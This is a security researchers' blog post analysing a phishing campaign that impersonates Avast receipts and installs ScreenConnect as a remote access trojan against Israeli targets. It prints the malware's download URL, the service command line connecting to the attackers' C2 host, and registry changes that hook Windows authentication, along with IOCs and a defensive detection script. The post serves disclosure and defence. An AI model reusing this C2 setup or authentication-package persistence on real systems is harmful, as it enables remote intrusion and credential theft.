
Unmasking Avast-Themed Malware Operation

11 min read, Apr 28, 2025

By: Maor Dayan and Assaf Hazan | April 28, 2025

Introduction: A Suspicious Receipt Leads to Discovery

Last week, what appeared to be a routine Avast antivirus purchase confirmation appeared in my inbox. As a security professional, I’ve developed a habit of scrutinizing such emails, and fortunately, this vigilance paid off. A subtle inconsistency in the header caught my attention, leading to a comprehensive investigation that ultimately revealed a sophisticated malware delivery operation specifically targeting Israeli businesses and individuals. In collaboration with Assaf Hazan, we dissected this campaign, uncovering a well-orchestrated attack leveraging legitimate tools to achieve persistent access to victims’ systems.

This article documents our findings in detail, providing a thorough technical analysis of the attack chain, malware capabilities, and potential attribution. We hope this research equips security professionals with the knowledge needed to detect and mitigate similar threats.

The Phishing Lure: Crafting a Convincing Deception

The initial attack vector was a meticulously crafted phishing email designed to appear as a legitimate Avast antivirus purchase confirmation. The social engineering aspect of this campaign deserves attention as it employed several techniques to appear credible.

The Phishing Email Impersonating Avast

The phishing email included the following convincing elements:

  • Professional Avast branding with the correct logo and brand colors
  • A legitimate-looking invoice for “Avast Ultimate” (a real product) for multiple devices
  • Pricing in the range of actual Avast offerings: $139.99 with a $68.11 discount
  • A seemingly authentic order ID (ADP2110306341)
  • A recent order date (April 24, 2025; the earlier emails used April 19)
  • Reference to a legitimate payment processor: “DigRiv Ireland, Ltd, a Digital River Company”
  • A plausible activation code (R2QFZ7-YSNUSJ-5UCGMN)
  • Multiple download options: “Download for PC,” “Download for Mac,” and Google Play Store for Android
  • A “See installation instructions” link to further the illusion of legitimacy

However, careful analysis revealed several red flags:

  • The sender domain did not match official Avast communications (using addresses like receipt@avast-billing.com or notification-emails.avast.com@oosthoutnetwork.nl)
  • Slight formatting inconsistencies not typically found in legitimate communications
  • Suspicious URL structures embedded in the “Download” buttons
  • Unusual tracking parameters attached to the links

Our team confirmed three similar phishing emails were received between April 19 and April 24, suggesting an active, ongoing campaign targeting multiple recipients.

The Attack Chain: Following the Redirection Maze

By analyzing the embedded links and performing controlled executions in a sandboxed environment, we mapped the complete attack chain from initial click to system compromise.

Stage 1: Multi-Level URL Redirection

When a victim clicks on the “Download for PC” button, they’re directed through a sophisticated redirection chain:

  1. Initial click leads to an Israeli domain: https://links.ravsend.co.il/?lid=38192499&sid=633243153
  2. This redirects to a tracking domain: https://8objp.bemobtrk.com/go/aa19f9ca-80da-4651-a132-bffe291ed419
  3. The tracking domain sets cookies for monitoring, including:
     • bemob-viewer-id=b7fa6ebe-6ada-4592-a10c-56ef8e7f8da7
     • bemob-uniq-visit:aa19f9ca-80da-4651-a132-bffe291ed419=1
     • bemob-click-id=8wrY7ZWMuFdAkJtkaXrC4Y
  4. Final redirection leads to GitHub: https://raw.githubusercontent.com/AvastIL/Avast/refs/heads/main/Avast.exe

The use of GitHub as a malware hosting platform is particularly noteworthy. GitHub enjoys a high level of trust among both users and security solutions, and connections to it are rarely blocked by corporate firewalls or security products. Furthermore, the attacker’s choice of username — “AvastIL,” with “IL” indicating Israel — clearly signifies an intent to target Israeli users specifically.

Stage 2: Execution and Initial Deployment

Once the Avast.exe file is downloaded and executed, it initiates the following process:

  1. The malware performs environmental checks, reading the computer name and machine GUID from the registry
  2. It checks system language settings, likely to confirm targeting Israeli users
  3. Creates temporary files in the user’s temp directory
  4. Drops several embedded components, including the ScreenConnect (ConnectWise Control) client software
[Screenshot from Kaspersky Sandbox]

The installer appears as a legitimate Windows application with normal dialog boxes, furthering the deception as shown in the actual screenshot we captured during our analysis. The malware’s installer window displays “ScreenConnect Client (0188ac31e11665df)” and asks the user to “Please wait while Windows configures ScreenConnect Client,” complete with a progress bar.

Analysis of the MSI installation process revealed the use of silent installation parameters (“/qn”) and the passing of certificate information for C2 authentication, as shown in this command line:

{ EncodedCertificateChain = {7}, Digest = {8}, Signature = {9} }
ScreenConnect.ScreenConnect.ClientSetup.msi;ScreenConnect.ClientSetup.msi /i "" /qn msiexec.exe

Kaspersky analysis of the sample identified it as:

  • Detection: HEUR:Trojan.Win32.Generic
  • Classification: Remote Access Tool / Backdoor

Stage 3: Persistence and System Modification

Our analysis of the suspicious activities log revealed extensive system modifications made by the malware:

Service Creation and C2 Communication Setup: The malware creates a Windows service named “ScreenConnect Client (0188ac31e11665df)” for persistence, but crucially, this service is not just a simple Windows service — it’s configured to actively listen for and establish connections to the attacker’s command and control infrastructure:

  • Service_path: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c="

This service establishes a persistent encrypted connection to the C2 server, using a unique session identifier and an encrypted authentication key. The service continuously listens for incoming commands from the attackers.

Authentication Package Modification: Perhaps most concerning, the malware modifies the Windows authentication packages via registry:

  • Registry_key: "\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa" Registry_value_name: "Authentication Packages" Registry_value (REG_MULTI_SZ, two entries): "msv1_0", "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsAuthenticationPackage.dll"

This technique allows the malware to potentially intercept credentials by integrating its own DLL into Windows authentication processes.

COM Object Registration: The malware registers COM objects to further establish persistence:

  • Registry_key: "\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32" Registry_value: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsCredentialProvider.dll"

File Association Creation: It establishes a custom URI handler for launching the ScreenConnect client:

  • Registry_key: "\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0188ac31e11665df\shell\open\command" Registry_value: "\"$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsClient.exe\" \"%1\""

System Restore Point Creation: Interestingly, the malware creates a System Restore point using SrTasks.exe with the ExecuteScopeRestorePoint parameter. This unusual behavior might serve to:

  • Ensure system stability for long-term access
  • Create a fallback mechanism if the infection is detected
  • Prevent system instability that could lead to premature detection
[Process chain from Kaspersky Threat Intelligence]

The process chain, as visualized in our second screenshot, shows the hierarchical execution from initial dropper through multiple stages of the attack, including numerous high-severity system modifications.

Technical Analysis: ScreenConnect as a Remote Access Trojan

Binary Analysis

The downloaded executable (Avast.exe) has the following properties:

  • MD5: 14B3201E37D5AF8CBC6DBF810855F6C8
  • SHA1: 4C9D0DE6A87F9D46CC475C572FF890D4F81BB242
  • SHA256: 2BA3B56E91B74EEC4908A234CE652D50615B52B527430AD0BE35CB53ACC6EAF4
  • File size: 5,641,088 bytes
  • File type: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections

We also analyzed a second sample:

  • MD5: 0B23AC3DC2B9C49944CE7C9C405ED501
  • SHA1: 5E2071A1DA17233D69B0EB03D16F18B91D222A2E
  • SHA256: 5F8AC3ECC4F610E26E3805196F43322F60875B6983BEBC513A82A0F570DB9D32

Static analysis revealed the malware was compiled on November 18, 2022 (timestamp: 2022:11:18 20:10:20+00:00), using LinkerVersion 14.33. This suggests the campaign may have been running significantly longer than initially suspected, with the threat actors possibly refining their techniques over time.

The malware’s internal structure shows it’s primarily a dropper for the ScreenConnect components. While it doesn’t employ advanced packing techniques, it does contain substantial embedded components and uses multiple obfuscation techniques to evade initial detection.

Dropped Files Analysis

The malware deploys numerous files, with the most significant being components of the ScreenConnect remote access tool:

  • ScreenConnect.ClientService.exe (MD5: 752D5CDDA2A1D93D27E38F98A5D23FC2)
  • ScreenConnect.WindowsClient.exe (MD5: 9562334DD9A47EC1239A8667DDC1F01C)
  • ScreenConnect.Client.dll (MD5: 7EE2543520D72FD54827F3D11A21EF8D)
  • ScreenConnect.Windows.dll (MD5: 94216EB90CA53FBB175F0EE6ADBFB663)
  • ScreenConnect.Core.dll (MD5: 1DB8B9FA0BDCBFAAB807F715C288C19A)
  • ScreenConnect.WindowsAuthenticationPackage.dll (MD5: 5ADCB5AE1A1690BE69FD22BDF3C2DB60)
  • ScreenConnect.WindowsCredentialProvider.dll (MD5: A81497B417D4F67EA6CAB399BD3A71F8)
  • Various supporting configuration files (.config)

The intermediate installation process also leverages Microsoft deployment technologies and DLLs, including:

  • Microsoft.Deployment.WindowsInstaller.dll
  • Microsoft.Deployment.Compression.dll
  • Microsoft.Deployment.Compression.Cab.dll

ScreenConnect: A Legitimate Tool Turned Malicious

ScreenConnect (now branded as ConnectWise Control) is a legitimate remote support and access tool widely used by IT departments and managed service providers. However, when deployed surreptitiously, it effectively functions as a full-featured Remote Access Trojan (RAT).

What makes ScreenConnect particularly dangerous as an attack tool:

  1. Complete Remote Control: It provides full interactive desktop access, allowing attackers to navigate the system as if physically present
  2. File Transfer Capabilities: Attackers can upload additional malware or exfiltrate sensitive data
  3. Keystroke Logging: The tool can capture keystrokes, potentially compromising credentials
  4. Command Execution: Attackers can run arbitrary commands with the privileges of the logged-in user
  5. Credential Access: The authentication package modifications suggest the attackers may be attempting to collect domain credentials
  6. Stealth Operation: As a legitimate tool, it’s less likely to trigger traditional antivirus detection
  7. Persistent Access: The service-based installation ensures the tool remains running even after system reboots

The use of legitimate remote administration tools (LRATs) in attacks has grown increasingly common as threat actors seek to blend their activities with normal IT operations. This “living off the land” approach complicates detection, as the tools themselves aren’t inherently malicious.

Network Communications and Command & Control

The malware establishes multiple network connections to maintain control over the compromised system:

Primary C2 Connection

The main command and control channel connects to:

screen.solandalucia-carcosmetics.com:8041

In some variants, we observed connections to an alternative server:

screen.nadlan.center:8041

The specific C2 infrastructure used:

  • C2 Domain: screen.nadlan.center
  • C2 IP: 82.165.164.194 (port 8041)
  • Alt C2 Domain: screen.solandalucia-carcosmetics.com
  • Alt C2 IP: 79.127.221.55 (port 8041)

The complete connection string includes extensive parameters for authentication:

?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c=

The parameter k= contains a long, encrypted string that likely includes authentication information and possibly system identifiers. The s= parameter appears to be a unique session identifier (02ba7bd3-9124-4ed0-87b8-a9910b7d9b42) that may be used by the attackers to track and organize compromised systems.

Network Indicators

Several domain names associated with this campaign contain references to Israel or Israeli businesses:

  • “solandalucia-carcosmetics.com” appears to blend Spanish (“sol andalucia” — sun of Andalucia) with “carcosmetics”
  • “nadlan.center” uses the Hebrew term “nadlan” (נדל”ן) which means “real estate”
  • The GitHub account “AvastIL” with “IL” representing Israel’s country code

This naming pattern reinforces our assessment that the campaign specifically targets Israeli entities, possibly in sectors like real estate and cosmetics.

Suspicious Activities and Severity Assessment

Our analysis of the suspicious activities data revealed several high-severity actions performed by the malware:

HIGH SEVERITY (660): Modification of authentication packages via registry

This is particularly concerning as it could allow credential theft

HIGH SEVERITY (660): Suspicious service creation

Ensures persistence of the malware after system reboots

MEDIUM SEVERITY (500): Popular remote administration tools execution

Multiple instances of ScreenConnect components being executed

LOW SEVERITY (290): Various supporting activities including:

  • Unknown DLL launches via rundll32
  • COM object registration
  • Standard service creation
  • Double file extension file creation
  • File association modifications

The cumulative risk posed by these activities is substantial, indicating a sophisticated and determined threat actor with a focus on maintaining persistent access to compromised systems.

Target Analysis: Why Israel?

The campaign shows clear signs of specifically targeting Israeli entities:

  1. Domain Selection: Using an Israeli domain (links.ravsend.co.il) in the redirect chain
  2. GitHub Username: “AvastIL” with the “IL” country code for Israel
  3. Domain Names: Using Hebrew terms like “nadlan” (real estate) in C2 domains
  4. Environment Checks: The malware checks system language settings before proceeding

This targeting suggests the campaign is not opportunistic but rather a focused operation against Israeli organizations and individuals. While our investigation couldn’t definitively determine which sectors were most targeted, the domain names suggest possible focus on real estate and commercial businesses.

Possible Attribution

DISCLAIMER: The following attribution analysis is speculative and based on behavioral patterns only. Definitive attribution requires additional evidence and should be approached with caution.

Several techniques employed in this campaign bear similarities to operations previously attributed to the MuddyWater threat group (also known as Static Kitten, MERCURY, or Seedworm). MuddyWater is a cyber espionage group believed to be operating since at least 2017, primarily targeting the Middle East.

Similarities to MuddyWater’s known tactics include:

  1. Use of Legitimate Remote Tools: MuddyWater has a documented history of leveraging various legitimate remote administration tools, including ScreenConnect, TeamViewer, and AnyDesk to maintain access to compromised systems. This pattern of abusing legitimate remote access software is consistent with their established tactics.
  2. Multi-Stage Deployment: The group often employs multi-stage deployment processes similar to what we observed, with sophisticated redirection chains leading to the final payload.
  3. GitHub for Distribution: Previous MuddyWater campaigns have utilized GitHub repositories for malware distribution, particularly targeting Middle Eastern entities.
  4. Israel-Specific Targeting: The group has consistently targeted entities in the Middle East, including specific campaigns against Israeli organizations as documented by Israel’s National Cyber Directorate (reference: CERT-IL Alert W-1728, https://www.gov.il/BlobFolder/reports/alert_1728/he/ALERT-CERT-IL-W-1728.pdf).
  5. Authentication Package Modifications: Similar techniques for persistence and credential access have been observed in previous MuddyWater operations.

However, several factors prevent us from making a definitive attribution:

  1. These techniques are not exclusive to MuddyWater and could be employed by other threat actors
  2. The observed tactics could represent mimicry or a false flag operation
  3. We lack sufficient telemetry data across multiple victims to establish a broader pattern
  4. The command and control infrastructure does not conclusively match known MuddyWater operations

Without additional evidence, we can only note the similarities while acknowledging that definitive attribution to MuddyWater or any other specific threat actor would be premature.

Comprehensive Indicators of Compromise (IOCs)

Email Indicators

  • From: receipt@avast-billing.com, notification-emails.avast.com@oosthoutnetwork.nl
  • Subject: “Thanks again for choosing Avast! Your invoice”
  • References to activation code: R2QFZ7-YSNUSJ-5UCGMN
  • Order ID: ADP2110306341
  • Order date: April 24, 2025

URLs and Domains

Command and Control Servers

  • Primary C2: screen.nadlan.center:8041 (IP: 82.165.164.194)
  • Secondary C2: screen.solandalucia-carcosmetics.com:8041 (IP: 79.127.221.55)

Session Identifiers (Multiple Variants)

  • s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42
  • s=2769ebf5-effd-4762-a041-d5641541438e
  • s=cd8ad310-dfbd-44ed-8a96-4ad27a6b0d3a

File Hashes

Main Dropper:

Sample 1:

  • MD5: 14B3201E37D5AF8CBC6DBF810855F6C8
  • SHA1: 4C9D0DE6A87F9D46CC475C572FF890D4F81BB242
  • SHA256: 2BA3B56E91B74EEC4908A234CE652D50615B52B527430AD0BE35CB53ACC6EAF4

Sample 2:

  • MD5: 0B23AC3DC2B9C49944CE7C9C405ED501
  • SHA1: 5E2071A1DA17233D69B0EB03D16F18B91D222A2E
  • SHA256: 5F8AC3ECC4F610E26E3805196F43322F60875B6983BEBC513A82A0F570DB9D32

ScreenConnect Components:

ScreenConnect.ClientService.exe

  • MD5: 752D5CDDA2A1D93D27E38F98A5D23FC2

ScreenConnect.WindowsClient.exe

  • MD5: 9562334DD9A47EC1239A8667DDC1F01C

ScreenConnect.Client.dll

  • MD5: 7EE2543520D72FD54827F3D11A21EF8D

ScreenConnect.Windows.dll

  • MD5: 94216EB90CA53FBB175F0EE6ADBFB663

ScreenConnect.Core.dll

  • MD5: 1DB8B9FA0BDCBFAAB807F715C288C19A

ScreenConnect.WindowsAuthenticationPackage.dll

  • MD5: 5ADCB5AE1A1690BE69FD22BDF3C2DB60

ScreenConnect.WindowsCredentialProvider.dll

  • MD5: A81497B417D4F67EA6CAB399BD3A71F8

Registry Modifications

Authentication Package Modification:

Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
Value: Authentication Packages
Data (REG_MULTI_SZ): msv1_0, $programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsAuthenticationPackage.dll

Service Creation:

Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0188ac31e11665df)
Value: ImagePath
Data: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c="

COM Object Registration:

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32
Value: (Default)
Data: $programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsCredentialProvider.dll
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32
Value: ThreadingModel
Data: Apartment

URI Handler:

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-0188ac31e11665df\shell\open\command
Value: (Default)
Data: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsClient.exe" "%1"

Detection Opportunities

Network Detection

  • Block outbound connections to the identified C2 domains and IPs
  • Alert on connections to non-standard ports (8041)
  • Monitor for GitHub raw content downloads of executable files
  • Implement DNS filtering to block connections to known malicious domains

Email Security

  • Block emails with the identified sender domains
  • Flag emails containing Avast invoices with the specific format pattern
  • Implement brand impersonation detection for security vendors
  • Deploy DMARC, SPF, and DKIM to reduce email spoofing possibilities

Endpoint Security

  • Monitor for unexpected ScreenConnect client installations
  • Alert on service creation with ScreenConnect or similar remote administration tools
  • Implement application control to prevent unauthorized remote access software installation
  • Monitor registry modifications, particularly to authentication packages and COM registrations
  • Deploy an Endpoint Detection and Response (EDR) solution capable of detecting suspicious process chains
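As an added example (not code from the article), a small Python checker for two of the endpoint detections above: it parses the relay argument that the service ImagePath in Stage 3 passes to ScreenConnect.ClientService.exe (the same ?e=Access&h=...&p=...&s=...&k=... string discussed under Network Communications), flags any relay host outside an allowlist, and lists non-default entries in the Lsa "Authentication Packages" value. The allowlist host, the expanded $programfiles path and the k= value in the sample are constructed placeholders.

```python
import re
from urllib.parse import parse_qs

# The ScreenConnect client installer names its service "ScreenConnect Client (<16 hex>)";
# the article's sample used 0188ac31e11665df.
SERVICE_NAME_RE = re.compile(r"^ScreenConnect Client \(([0-9a-f]{16})\)$")

# Hypothetical allowlist: relay hosts the organisation's own IT/MSP actually uses.
APPROVED_RELAY_HOSTS = {"support.example-msp.invalid"}

# The only entry Windows ships in the Lsa "Authentication Packages" value by default.
DEFAULT_AUTH_PACKAGES = {"msv1_0"}

# Constructed sample modelled on the article's service entry ($programfiles expanded);
# the k= value is a placeholder, not the real key blob from the campaign.
SAMPLE_SERVICE = "ScreenConnect Client (0188ac31e11665df)"
SAMPLE_IMAGEPATH = (
    r'"C:\Program Files (x86)\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041'
    '&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=PLACEHOLDER%2bKEY&c=solandalucia&c=&c="'
)
SAMPLE_AUTH_PACKAGES = [
    "msv1_0",
    r"C:\Program Files (x86)\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsAuthenticationPackage.dll",
]


def split_command_line(cmd):
    """Split a Windows command line into arguments, honouring double quotes.
    (shlex mangles the backslashes in Windows paths, so a small regex is used.)"""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def parse_client_args(arg):
    """Parse the '?e=...&h=...&p=...&s=...&k=...&c=...' argument given to
    ScreenConnect.ClientService.exe. Repeated c= fields are kept as a list and
    percent-encoding (e.g. %2b inside k=) is decoded by parse_qs."""
    params = parse_qs(arg.lstrip("?"), keep_blank_values=True)

    def single(name):
        return params.get(name, [None])[0]

    return {
        "mode": single("e"),          # e=Access: unattended access session
        "session_type": single("y"),
        "host": single("h"),          # relay host the client calls back to
        "port": single("p"),
        "session_id": single("s"),    # per-install GUID used to track the machine
        "key": single("k"),
        "custom": params.get("c", []),
    }


def assess_service(service_name, image_path):
    """Return findings for one service entry; an empty list means nothing suspicious."""
    findings = []
    if not SERVICE_NAME_RE.match(service_name):
        return findings
    tokens = split_command_line(image_path)
    if len(tokens) < 2 or not tokens[1].startswith("?"):
        findings.append(f"{service_name}: ScreenConnect service without a relay argument")
        return findings
    args = parse_client_args(tokens[1])
    if args["host"] not in APPROVED_RELAY_HOSTS:
        findings.append(
            f"{service_name}: relay {args['host']}:{args['port']} is not an approved "
            f"ScreenConnect host (session {args['session_id']})"
        )
    return findings


def rogue_auth_packages(values):
    """Entries of the REG_MULTI_SZ 'Authentication Packages' value under
    HKLM\\SYSTEM\\...\\Control\\Lsa beyond the Windows default; any DLL path
    listed here is loaded into LSASS at boot, so every extra entry is worth a look."""
    return [v for v in values if v.lower() not in DEFAULT_AUTH_PACKAGES]


if __name__ == "__main__":
    for line in assess_service(SAMPLE_SERVICE, SAMPLE_IMAGEPATH):
        print("ALERT:", line)
    for dll in rogue_auth_packages(SAMPLE_AUTH_PACKAGES):
        print("ALERT: non-default authentication package:", dll)
```

On a live host the same two functions can be fed from HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath and the Lsa key (via winreg or exported .reg data) instead of the constructed samples.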

Mitigation Steps if Compromised

If you believe your system has been compromised by this malware:

  1. Disconnect affected systems from the network immediately
  2. Terminate ScreenConnect processes and services
  3. Remove registry persistence mechanisms
  4. Reset all credentials used on the affected system
  5. Conduct thorough forensic analysis to determine extent of compromise
  6. Use the provided IOCs to hunt for potential compromises in your environment

Conclusion: Beyond a Single Attack

This campaign demonstrates the evolving sophistication of targeted attacks against Israeli entities. Several aspects of this operation are particularly concerning:

  1. Use of Legitimate Tools: By leveraging ScreenConnect, the attackers reduce their chances of detection by traditional security tools
  2. Sophisticated Social Engineering: The well-crafted Avast-themed lure shows careful research and attention to detail
  3. Deep System Integration: The modification of authentication packages indicates a focus on long-term access and potential credential theft
  4. Infrastructure Setup: The dedicated C2 domains suggest a well-resourced and organized threat actor
  5. Targeted Focus: The clear targeting of Israeli entities indicates a deliberate intelligence gathering operation

The campaign appears to be part of a broader effort targeting Israeli businesses and individuals across multiple sectors. The specific focus on Israel, combined with the technical sophistication and potential links to known threat actors like MuddyWater, suggests this campaign may have intelligence gathering motives beyond simple financial gain.

As defenders, we must remain vigilant against such evolving threats. By understanding the techniques employed in this campaign, organizations can better position their defenses to detect and respond to similar attacks. The IOCs and detection rules provided in this article serve as a starting point for threat hunting and enhancing security postures against this specific threat and related campaigns.

Note: If you believe you may have been targeted by this or a similar campaign, isolate the affected system immediately, change all passwords from a clean device, and contact your security team or a cybersecurity professional. This research is shared to help defenders protect their organizations from similar threats.
